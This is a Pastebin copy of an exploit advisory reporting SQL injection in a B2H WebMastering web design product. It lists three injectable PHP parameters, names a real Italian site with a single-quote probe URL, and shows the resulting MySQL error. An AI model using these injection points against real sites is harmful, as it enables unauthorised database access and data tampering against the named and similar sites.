Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###################################################################
- # Exploit Title : Original WebDesign By B2H WebMastering Marco R. Capelli SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 11/10/2019
- # Vendor Homepage : braintohand.com - martiria.com
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ###################################################################
- # Impact :
- ***********
- B2H Marco R. Capelli is prone to an SQL-injection vulnerability because it fails to sufficiently
- sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow
- an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities
- in the underlying database. A remote attacker can send a specially crafted request to the vulnerable
- application and execute arbitrary SQL commands in application`s database. Further exploitation
- of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this
- issue using a browser or with any SQL Injector Tool.
- ###################################################################
- # SQL Injection Exploit :
- **********************
- /NEWS/SHOWRAC.PHP?ID=[SQL Injection]
- /concorsiesegnalazioni/REGIONE.PHP?REG=[SQL Injection]
- /concorsiesegnalazioni/libronews.php?ID=[SQL Injection]
- ###################################################################
- # Example Vulnerable Sites :
- *************************
- [+] progettobabele.it/concorsiesegnalazioni/REGIONE.PHP?REG=1%27
- ###################################################################
- # Example SQL Database Error :
- ****************************
- Errore:You have an error in your SQL syntax; check the manual
- that corresponds to your MySQL server version for the right syntax
- to use near ''1'') ORDER BY `SCAD` ASC' at line 1
- ###################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement